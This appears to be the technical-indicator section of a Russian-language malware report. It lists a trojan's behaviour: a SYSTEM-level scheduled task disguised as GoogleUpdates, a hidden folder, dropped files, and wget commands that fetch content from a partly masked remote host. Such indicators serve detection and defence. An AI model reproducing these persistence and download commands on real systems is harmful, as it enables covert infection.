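Техническая информация
Подзаголовки разделов в тексте отсутствуют; по содержанию строк ниже перечислены: файл задания планировщика, командные строки запускавшихся процессов, пути к файлам, сетевые обращения (порт 80, HTTP-адреса и DNS-запрос) и классы окон. Символы ## в имени домена, по-видимому, скрывают часть адреса, поэтому в таком виде строка не подходит для точного сопоставления как сетевой индикатор.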
- %WINDIR%\Tasks\GoogleUpdates.job
- '%TEMP%\google.exe' -p1234567890__
- '%TEMP%\wget.exe' --load-cookies cookies.txt http://ma##.##cybernews.info/2.php
- '%TEMP%\wget.exe' http://ma##.##cybernews.info/13:56:30..ini
- '%TEMP%\setups.exe' -p1234567890__
- '%TEMP%\wget.exe' --save-cookies cookies.txt http://ma##.##cybernews.info/1.php
- '%TEMP%\GoogleUpdates.exe'
- '<SYSTEM32>\schtasks.exe' /Delete /tn GoogleUpdates /f
- '<SYSTEM32>\attrib.exe' +S +H "c:\$Recycle.Msi"
- '<SYSTEM32>\wscript.exe' "%TEMP%\Google.vbs"
- '<SYSTEM32>\schtasks.exe' /Create /tn GoogleUpdates /TR "c:\$Recycle.Msi\GoogleUpdates.exe" /SC MINUTE /mo 10 /ru "SYSTEM"
- '<SYSTEM32>\ping.exe' -n 10 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\setup.vbs"
- '<SYSTEM32>\attrib.exe' -S -H "c:\$Recycle.Msi"
- '<SYSTEM32>\find.exe' "Microsoft Windows XP"
- %TEMP%\google.exe
- C:\$Recycle.Msi\cookies.txt
- C:\$Recycle.Msi\GoogleUpdates.exe
- %TEMP%\2.php
- %TEMP%\Google.vbs
- %TEMP%\Google.cmd
- %TEMP%\cookies.txt
- %TEMP%\setup.cmd
- %TEMP%\GoogleUpdates.exe
- %TEMP%\setups.exe
- %TEMP%\1.php
- %TEMP%\wget.exe
- %TEMP%\setup.vbs
- 'ma##.##cybernews.info':80
- ma##.##cybernews.info/2.php
- ma##.##cybernews.info/1.php
- DNS ASK ma##.##cybernews.info
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'